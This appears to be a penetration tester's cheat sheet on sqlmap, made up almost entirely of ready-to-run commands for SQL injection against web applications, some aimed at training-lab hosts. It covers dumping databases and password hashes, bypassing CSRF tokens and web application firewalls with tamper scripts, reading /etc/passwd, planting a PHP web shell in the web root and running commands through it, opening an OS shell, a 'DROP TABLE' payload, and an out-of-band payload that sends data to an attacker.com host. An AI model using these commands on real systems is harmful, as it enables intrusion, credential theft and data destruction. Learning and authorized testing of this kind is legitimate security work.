SQLMAP

GET Request

python sqlmap.py -u 'http://inlanefreight.htb/page.php?id=5'

sqlmap -u "http://www.example.com/vuln.php?id=1" --batch

Note: in this case, option '-u' is used to provide the target URL, while the switch '--batch' is used for skipping any required user-input, by automatically choosing using the default option.

sqlmap 'http://www.example.com/?id=1' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0' -H 'Accept: image/webp,*/*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Connection: keep-alive' -H 'DNT: 1'

POST Request

sqlmap 'http://www.example.com/' --data 'uid=1&name=test'

If we have a clear indication that the parameter uid is prone to an SQLi vulnerability, we could narrow down the tests to only this parameter using -p uid. Otherwise, we could mark it inside the provided data with the usage of special marker *

sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'

Full Request

 sqlmap -r req.txt

Cookies

sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'

sqlmap ... -H='Cookie:PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'

HTTP Headers

We can apply the same to options like --host, --referer, and -A/--user-agent, which are used to specify the same HTTP headers' values.

--random-agent : randomly select a User-agent header value.

While SQLMap, by default, targets only the HTTP parameters, it is possible to test the headers for the SQLi vulnerability. The easiest way is to specify the "custom" injection mark after the header's value (e.g. --cookie="id=1*"). The same principle applies to any other part of the request.

PUT Request

 sqlmap -u www.target.com --data='id=1' --method PUT

Dump Databases

--dump automatically dump all data.

--dump-all --exclude-sysdbs

Display Errors

--parse-errors

Verbose Output

sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch

Using Proxy

--proxy option to redirect the whole traffic through a (MiTM) proxy (e.g., Burp)

Prefix/Suffix

There is a requirement for special prefix and suffix values in rare cases, not covered by the regular SQLMap run. For such runs, options --prefix and --suffix can be used.

$query = "SELECT id,name,surname FROM users WHERE id LIKE (('" . $_GET["q"] . "')) LIMIT 0,1";
$result = mysqli_query($link, $query);

sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"

sqlmap http://IP:PORT/test.php?col=id --random-agent --batch --dump --prefix='`)' --level=5 --risk=3

Level/Risk

sqlmap -u www.example.com/?id=1 -v 3 --level=5

--level (1-5, default 1)

--risk (1-3, default 1)

sqlmap -u www.example.com/?id=1 --level=5 --risk=3

Advanced Tuning

Status Codes

For example, when dealing with a huge target response with a lot of dynamic content, subtle differences between TRUE and FALSE responses could be used for detection purposes. If the difference between TRUE and FALSE responses can be seen in the HTTP codes (e.g. 200 for TRUE and 500 for FALSE), the option --code could be used to fixate the detection of TRUE responses to a specific HTTP code (e.g. --code=200).

Titles

If the difference between responses can be seen by inspecting the HTTP page titles, the switch --titles could be used to instruct the detection mechanism to base the comparison based on the content of the HTML tag <title>.

Strings

In case of a specific string value appearing in TRUE responses (e.g. success), while absent in FALSE responses, the option --string could be used to fixate the detection based only on the appearance of that single value (e.g. --string=success).

Text-only

When dealing with a lot of hidden content, such as certain HTML page behaviors tags (e.g. <script>, <style>, <meta>, etc.), we can use the --text-only switch, which removes all the HTML tags, and bases the comparison only on the textual (i.e., visible) content.

Techniques

For example, if we want to skip the time-based blind and stacking SQLi payloads and only test for the boolean-based blind, error-based, and UNION-query payloads, we can specify these techniques with --technique=BEU.

UNION SQLi Tuning

In some cases, UNION SQLi payloads require extra user-provided information to work. If we can manually find the exact number of columns of the vulnerable SQL query, we can provide this number to SQLMap with the option --union-cols (e.g. --union-cols=17). In case that the default "dummy" filling values used by SQLMap -NULL and random integer- are not compatible with values from results of the vulnerable SQL query, we can specify an alternative value instead (e.g. --union-char='a').

Furthermore, in case there is a requirement to use an appendix at the end of a UNION query in the form of the FROM <table> (e.g., in case of Oracle), we can set it with the option --union-from (e.g. --union-from=users).

5 columns => sqlmap http://83.136.251.226:45849/case7.php?id=1 --union-cols=5

Basic DB Data Enumeration

hostname of the vulnerable target (--hostname),
current user's name (--current-user),
current database name (--current-db),
password hashes (--passwords).

SQLMap will skip SQLi detection if it has been identified earlier and directly start the DBMS enumeration process.

Enumeration usually starts with the retrieval of the basic information:

Database version banner (switch --banner)
Current user name (switch --current-user)
Current database name (switch --current-db)
Checking if the current user has DBA (administrator) rights.

sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba

Note: The 'root' user in the database context in the vast majority of cases does not have any relation with the OS user "root", other than that representing the privileged user within the DBMS context. This basically means that the DB user should not have any constraints within the database context, while OS privileges (e.g. file system writing to arbitrary location) should be minimalistic, at least in the recent deployments. The same principle applies for the generic 'DBA' role.

Table Enumeration

sqlmap -u "http://www.example.com/?id=1" --tables -D testdb

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb

Tip: Apart from default CSV, we can specify the output format with the option --dump-format to HTML or SQLite, so that we can later further investigate the DB in an SQLite environment.

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname

...SNIP...
Database: testdb

Table: users
[4 entries]
+--------+------------+
| name   | surname    |
+--------+------------+
| luther | blisset    |
| fluffy | bunny      |
| wu     | ming       |
| NULL   | nameisnull |
+--------+------------+

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3

...SNIP...
Database: testdb

Table: users
[2 entries]
+----+--------+---------+
| id | name   | surname |
+----+--------+---------+
| 2  | fluffy | bunny   |
| 3  | wu     | ming    |
+----+--------+---------+

Conditional Enumeration

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"

...SNIP...
Database: testdb

Table: users
[1 entry]
+----+--------+---------+
| id | name   | surname |
+----+--------+---------+
| 2  | fluffy | bunny   |

DB Schema Enumeration

sqlmap -u "http://www.example.com/?id=1" --schema

Searching for Data

Search Tables

sqlmap -u "http://www.example.com/?id=1" --search -T user

Search Columns

sqlmap -u "http://www.example.com/?id=1" --search -C pass

DB Users Password Enumeration and Cracking

Content of system tables containing database-specific credentials (e.g., connection credentials)

sqlmap -u "http://www.example.com/?id=1" --passwords --batch

Bypass

Anti-CSRF Token Bypass

sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

Unique Value Bypass

sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5

Calculated Parameter Bypass

the option --eval should be used, where a valid Python code is being evaluated just before the request is being sent to the target

sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5

WAF Bypass

User-agent Blacklisting Bypass

--random-agent

Tamper Scripts

Awesome Sqlmap TampersRedTeamRecipe

To get a whole list of implemented tamper scripts, along with the description as above, switch --list-tampers can be used

Start with --tamper=between,randomcase

Tamper-Script

Description

0eunion

Replaces instances of UNION with e0UNION

base64encode

Base64-encodes all characters in a given payload

between

Replaces greater than operator (>) with NOT BETWEEN 0 AND # and equals operator (=) with BETWEEN # AND #

commalesslimit

Replaces (MySQL) instances like LIMIT M, N with LIMIT N OFFSET M counterpart

equaltolike

Replaces all occurrences of operator equal (=) with LIKE counterpart

halfversionedmorekeywords

Adds (MySQL) versioned comment before each keyword

modsecurityversioned

Embraces complete query with (MySQL) versioned comment

modsecurityzeroversioned

Embraces complete query with (MySQL) zero-versioned comment

percentage

Adds a percentage sign (%) in front of each character (e.g. SELECT -> %S%E%L%E%C%T)

plus2concat

Replaces plus operator (+) with (MsSQL) function CONCAT() counterpart

randomcase

Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)

space2comment

Replaces space character ( ) with comments `/

space2dash

Replaces space character ( ) with a dash comment (--) followed by a random string and a new line ()

space2hash

Replaces (MySQL) instances of space character ( ) with a pound character (#) followed by a random string and a new line ()

space2mssqlblank

Replaces (MsSQL) instances of space character ( ) with a random blank character from a valid set of alternate characters

space2plus

Replaces space character ( ) with plus (+)

space2randomblank

Replaces space character ( ) with a random blank character from a valid set of alternate characters

symboliclogical

Replaces AND and OR logical operators with their symbolic counterparts (&& and |)

versionedkeywords

Encloses each non-function keyword with (MySQL) versioned comment

versionedmorekeywords

Encloses each keyword with (MySQL) versioned comment

All in one

`sqlmap -r req.txt --level=5 --risk=3 --dbms="mysql" --dbs --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor -p search`

Miscellaneous Bypasses

--chunked splits the POST request's body into so-called "chunks." Blacklisted SQL keywords are split between chunks in a way that the request containing them can pass unnoticed

HTTP parameter pollution (HPP), where payloads are split in a similar way as in case of --chunked between different same parameter named values (e.g. ?id=1&id=UNION&id=SELECT&id=username,password&id=FROM&id=users...), which are concatenated by the target platform if supporting it (e.g. ASP)

WSTG - Latest | OWASP Foundation

HTTP Parameter Pollution | Examples & Mitigation Methods | ImpervaLearning Center

OS Exploitation

File Read/Write

Is DBA ?

sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba

Read File

sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"

Write File

echo '<?php system($_GET["cmd"]); ?>' > shell.php

sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"

curl http://www.example.com/shell.php?cmd=ls+-la

OS Command Execution

sqlmap -u "http://www.example.com/?id=1" --os-shell

SQLMap defaulted to UNION technique to get an OS shell, but eventually failed to give us any output No output

Try to specify another technique --technique=E

sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E

Techniques

The technique characters BEUSTQ refers to the following:

B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries
T: Time-based blind
Q: Inline queries

Boolean-based blind SQL Injection

AND 1=1

Error-based SQL Injection

AND GTID_SUBSET(@@version,0)

UNION query-based

UNION ALL SELECT 1,@@version,3

Stacked queries

; DROP TABLE users

Time-based blind SQL Injection

AND 1=IF(2>1,SLEEP(5),0)

Inline queries

SELECT (SELECT @@version) from

Out-of-band SQL Injection

LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\README.txt'))

PreviousRubeus NextVulnerability Scanners

Last updated 8 months ago